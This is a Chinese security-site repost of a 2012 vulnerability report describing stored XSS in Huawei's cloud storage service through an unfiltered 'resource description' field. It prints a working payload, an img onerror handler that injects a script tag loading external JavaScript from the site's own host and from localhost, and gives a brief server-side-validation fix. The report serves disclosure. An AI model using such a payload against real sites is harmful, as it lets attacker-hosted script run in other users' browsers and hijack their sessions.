安全黑客
当前位置:安全黑客文章资讯安全漏洞漏洞安全
日期:2012-09-26 11:16:00  来源:本站整理

华为网盘存储型XSS,可加载外部JS[漏洞安全]

赞助商链接



  本文“华为网盘存储型XSS,可加载外部JS[漏洞安全]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

上次提交么说清楚,不好意思,
在“资源描写”的地方对提交的content参数过滤不严,招致XSS.
漏洞代码:
<img src="2.jps" onerror="var a = document.getElementsByTagName('head').item(0);
var b = document.createElement('script');
b.type = 'text/javascript';
b.src='http:// www.110hack.com /db.js';
a.appendChild(b);">

只测试了IE和GOOGLE浏览器,其他未测试.


过滤不严,招致XSS.
漏洞代码:
 
<img src="2.jps" onerror="var a = document.getElementsByTagName('head').item(0);
var b = document.createElement('script');
b.type = 'text/javascript';
b.src='http://127.0.0.1/db.js';
a.appendChild(b);">


只测试了IE和GOOGLE浏览器,其他未测试.


修复筹划:
服务端也考证


  以上是“华为网盘存储型XSS,可加载外部JS[漏洞安全]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
  • 华为网盘存储型XSS,可加载外部JS
  • 本文地址: 与您的QQ/BBS好友分享!

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    免责条款 - 广告合作 - 下载声明 - 欢迎投稿 - 友情连接 - 网站地图 -
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .